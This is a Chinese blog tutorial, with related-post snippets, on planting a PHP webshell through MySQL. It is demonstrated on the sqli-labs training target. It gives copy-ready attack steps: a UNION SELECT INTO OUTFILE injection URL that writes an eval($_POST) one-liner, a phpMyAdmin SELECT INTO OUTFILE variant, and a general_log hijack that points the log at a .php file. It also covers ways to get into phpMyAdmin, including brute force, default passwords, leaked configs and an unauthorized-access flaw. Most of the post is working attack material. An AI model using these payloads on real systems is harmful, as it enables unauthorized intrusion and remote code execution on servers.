sql注入和phpmyadmin日志写入webshell

最新推荐文章于 2024-06-05 11:40:11 发布
最新推荐文章于 2024-06-05 11:40:11 发布
阅读量1.6k 收藏 13
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54813510/article/details/130859673
版权

 写入webshell的前提条件:

1、需要root权限。

2、知道网站根目录的绝对路径。

3、数据库my.ini配置文件需要secure_file_priv配置为空。

secure_file_priv=''

sql注入写入webshell的方法:

1、通过outfile()函数写入一句话木马。

以sql-lab第一关为例

写入虚拟机靶场语句为下

 http://192.168.13.1/sqli-labs-master/Less-1/?id=-1' union select 1,'<?php @eval($_POST["cmd"])?>',3 into outfile 'D:/phpstudy_pro/WWW/shell.php' --+ 

网站根路径为:D:\phpstudy_pro\WWW

用蚁剑连接成功。

同时sqlmap集成了一键化利用。就是--os-shell的参数。

2.通过phpmyadmin写入webshell

如果网站安装了phpmyadmin并成功登录到了,利用通过phpmyadmin写入木马。

简单介绍phpmyadmin:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。界面如下

登录phpmyadmin的思路有:

1.暴力破解:我们可以使用一些暴力破解的工具对 phpMyAdmin 的密码进行暴力破解,我在此列出一些暴力破解工具:nmap暴力破解数据库用户名和密码脚本、msf的爆破模块、Burp的爆破功能、phpMyAdmin暴力破解工具。当然爆破这个技术离不开一个强大的字典,所以我们在平时还是要去搜集一些字典还是很有必要的。

2.使用默认密尝试。

3.源代码泄露: 在现在一些网站使用的CMS系统中,对config.inc.php 及 config等数据库配置文件进行编辑时,有可能会产生 bak文件,这个文件可以直接读取或者下载。部分安装phpMyAdmin的服务器的网站往往存在目录遍历漏洞,通过目录遍历,通过下载源代码等打包的一些文件查看这些打包文件或泄露的代码可以获取网站源代码中的数据库配置文件的信息,从而获取到root的账户和密码。

4.爆出的 phpMyAdmin未授权访问漏洞像之前宝塔爆出的 phpMyAdmin 漏洞用户可以通过访问 http://www.xxx.com:888/pma,直接以root的用户登录phpMyAdmin管理页面

phpmyadmin也需要三个前提条件,所以登录进去后首先secure_file_priv是否为空,通过sql语句

show global variables like '%secure%'

 同时注意secure_file_priv值不能通过sql语句来更改。

然后通过构建sql写入一句话木马

select '<?php @eval($_POST["cmd"])?>' into outfile 'D:/phpstudy_pro/WWW/shell2.php'

 

成功写入并用蚁剑成功连接。

3.通过phpmyadmin更改日志写入webshell

查看mysql是否开启全局日志,更改日志的路径。

查看是否开启全局日志的命令为:

show variables like '%general%'

查询结果可以看到没有开启日志记录,通过开启并更改日志路径和日志文件为php文件。通过日志记录一句话木马来利用。

开启命令为:

 set global general_log=ON

 更改路径命令为:

set global general_log_file='D:/phpstudy_pro/WWW/shell_log.php'

 再次查看更改成功

 再执行sql语句:

select '<?php @eval($_POST["cmd"])?>'

 查看日志成功记录了一句话木马

 用蚁剑测试连接成功。

割裤成
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9297
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
PhpMyAdmin无法导入sql文件的解决办法
10-29
PhpMyAdmin 无法导入 SQL 文件的解决办法 PhpMyAdmin 是一个功能强大的 MySQL 数据库管理工具,支持多种数据库管理操作,包括数据备份、恢复、查询、修改等。但是,部分用户在使用 PhpMyAdmin 时可能会遇到无法...
phpMyadminshell
wangyanjienice的博客
04-07 890
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看写入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法写入
玄机靶场 第二章日志分析-mysql应急响应
最新发布
qq_46343633的博客
06-05 1182
1.黑客第一次写入shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
SQL注入webshell
柠檬i的博客
08-06 686
`INTO OUTFILE`是MySQL用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统的指定文件。
【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 2964
phpmyadmin-SQL注入
WEB安全】PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4738
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
SQL注入写入Webshell(Lines terminated by写入
faclon666的博客
03-31 712
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。1.当mysql注入点为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
快递SQLPHPMYADMIN和NAVICAT版)
09-12
"phpmyadmin版.sql"和"navicat版.sql"是两个数据库脚本文件,它们分别包含了在PHPMYADMIN和NAVICAT导入快递SQL所需的数据结构和初始数据。使用这两个文件,用户可以轻松地在各自的环境搭建出完整的快递信息管理...
phpmyadmin上传Webshell总结.docx
08-31
利用MySQL日志功能,比如查询日志或慢查询日志,将Webshell写入这些日志文件,然后将日志文件转换为可执行的脚本。 (1)通过查询日志:确保查询日志开启,Webshell将记录在查询日志。 (2)通过慢查询日志...
sql.zip_phpmyadmin
09-23
总结来说,"sql.zip_phpmyadmin" 强调的是使用 phpMyAdmin 这一工具进行 SQL 查询和数据库管理。通过这个界面,用户可以高效地执行 SQL 操作,实现对 MySQL 或 MariaDB 数据库的各种管理和维护任务。了解 SQL 语言和...
使用sqlmap对进行php+mysql注入实战
dfdhxb995397的博客
05-31 482
作者:陈小兵一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程,也可能因为服务器配置等情况导致无法获取权限。 1.1php注入点的发现及扫描 1.使用漏洞扫描工具进行漏洞扫描 将目标url地址放在wvs进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入,其漏洞存在的...
网络安全面试题-SQL注入问题总结
m0_60571990的博客
03-25 1571
网络安全面试题-SQL注入问题总结
SQL注入篇——一句话木马
爱国小白帽
01-08 6371
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
假如遇到一个注入点如何利用sqlmap这款工具如何去webshell
weixin_45911307的博客
04-12 3287
利用sql注入写入webshell有两种方式 利用into outfile函数 利用这个漏洞的先决条件是: WEB目录具有的权限,能够使用单引号 知道网站的根目录或者知道根目录以下的目录 Secure_file_priv没有具体值 过程: 先判断是否存在注入并判断注入点 判断列 判断网站的根目录路径 使用into outfile函数写入木马文件,在这里要注意路径之间要使用双斜杠 访问刚刚上传的文件看是否上传成功 连接木马(使用菜刀,冰蝎,哥斯拉等连接shell的工具) 2.使用—o
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 475
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
phpmyadmin 查看sql历史记录
whatday的专栏
12-20 4609
点击 SQL(查询)选项卡。在窗口底部考左有一个控制台 选项卡 如图: 默认情况下它不会被展开,点击它就会展开历史记录 鼠标移上去后 还有 各种选项 ...
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
sql注入shell
08-07
### 回答1: 很抱歉,我作为AI语言模型不能提供有关SQL注入shell的信息。SQL注入是一种安全漏洞,可以通过在应用程序注入恶意代码来获取未经授权的访问权限。而shell是指编脚本来执行一系列命令,这与SQL注入无关。请注意保护您的应用程序免受SQL注入攻击,并遵守相关的安全规范。 ### 回答2: SQL注入shell是一种利用数据库系统的漏洞,以执行恶意代码的方式来获取控制权和执行对系统的攻击。具体步骤如下: 1. 进行SQL注入攻击:首先,攻击者需要找到目标系统存在SQL注入漏洞的位置,通常是通过向用户输入的参数插入恶意代码来实现。常见的注入点包括输入框、URL参数或表单字段。 2. 确定数据库类型:根据目标系统所使用的数据库类型(如MySQL、Oracle、MS SQL Server等),攻击者需要编相应的注入代码。 3. 构造注入语句:攻击者需要构造特定的SQL注入语句,以执行命令并获取系统控制权。例如,攻击者可以使用UNION语句将恶意代码插入到现有的SQL查询。 4. 写入恶意代码:通过注入语句,攻击者可以将恶意代码写入数据库。这段代码通常是一段能够执行系统命令的Shell脚本。 5. 执行恶意代码:在恶意代码被写入数据库后,攻击者可以通过执行相关的SQL查询来触发它,并实现远程命令执行。这样就可以获取系统的控制权,并执行各种攻击操作。 为了防止SQL注入攻击,开发人员需要采取以下措施: 1. 输入验证:对用户输入的数据进行严格的格式验证和过滤,防止恶意代码的注入。 2. 参数化查询:使用参数化的SQL查询语句,而不是拼接字符串的方式,可以确保输入数据不会被解释为代码。 3. 最小权限原则:将数据库用户的权限设置为最低,以限制攻击者对系统的访问。 4. 定期更新和修补:保持数据库系统和相关软件的更新,并及时修补已知的漏洞,以防止利用已知的攻击手法。 总之,SQL注入shell是一种危险的攻击方式,可通过有效的输入验证和安全编码实践来防止。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值